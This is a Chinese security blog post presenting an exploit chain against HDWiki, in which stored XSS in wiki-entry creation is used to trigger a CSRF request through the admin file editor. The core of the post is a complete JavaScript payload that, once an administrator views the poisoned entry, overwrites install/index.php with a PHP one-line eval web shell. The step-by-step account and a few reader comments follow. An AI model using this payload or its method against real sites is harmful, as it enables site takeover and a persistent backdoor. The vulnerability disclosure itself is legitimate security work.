您的位置 » 首页 » 实用工具 » 漏洞播报:HDWiki Xss+CSRF GetShell 0day利用方法

漏洞播报:HDWiki Xss+CSRF GetShell 0day利用方法

发表于3年前 | 作者: seay | 分类: 实用工具 | 孵化于:2013年08月08日 | 文章热度:4,778 次 全屏阅读

显示不全请点击全屏阅读

主要两处问题:

 
一、前台创建词条时插入内容只是editor的js对敏感code做了客户端过滤,传入服务器后服务器端过滤不够严格,构成Xss。
 
二、后台对文件编辑时没有限制相对路径的使用,文件可以直接使用相对路径编辑(在列表里可以看到默认是绝对路径的),并且在编辑文件位置没有进行验证,构成CSRF。
 
具体利用Getshell:
 
(普通用户)前台创建词条:
 
 
发布,截包修改:
 
 
这里插入的是一个写好的JS,编辑install/index.php内容为一句话木马。
 

内容如下:

function ajax(){
  
    var request = false;
  
    if(window.XMLHttpRequest) {
  
        request = new XMLHttpRequest();
  
    } else if(window.ActiveXObject) {
  
        var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
  
        for(var i=0; i<versions.length; i++) {
  
            try {
  
                request = new ActiveXObject(versions[i]);
  
            } catch(e) {}
  
        }
  
    }
  
    return request;
  
}
  
var _x = ajax();
  
postgo();
  
function postgo() {
  
    src="http://127.0.0.1/hdwiki/index.php?admin_filemanager-edit";
  
    data="fname=install%2Findex.php&dir=.%2F&content=%3C%3Fphp+eval%28%24_POST%5Bc%5D%29%3B%3F%3E&dosubmit=+%E7%A1%AE%E8%AE%A4%E4%BF%AE%E6%94%B9+";
  
    xhr_act("POST",src,data);
  
}
  
function xhr_act(_m,_s,_a){
  
    _x.open(_m,_s,false);
  
    if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  
    _x.send(_a);
  
    return _x.responseText;
  
}

提交发布。
 
(管理员账号)登陆后台:
 
查看用户创建的词条:
 
CSRF getshell:

Tags:

HDWiki漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/3288/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有3个筒子的人留下了脚印...

  • showmethemoney 说:
    1楼
    2013 年 8 月 8 日 下午 5:50 回复

    xss加上后台文件编辑 不可小瞧啊 😐

  • 0x0F 说:
    2楼
    2013 年 8 月 20 日 下午 2:31 回复

    次奥 。。版权呢?

    • 【管理员】seay 说:
      2013 年 8 月 21 日 上午 12:57 回复

      这个文章是在红黑联盟转载的,详细的版权说明请看http://www.cnseay.com/42/

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)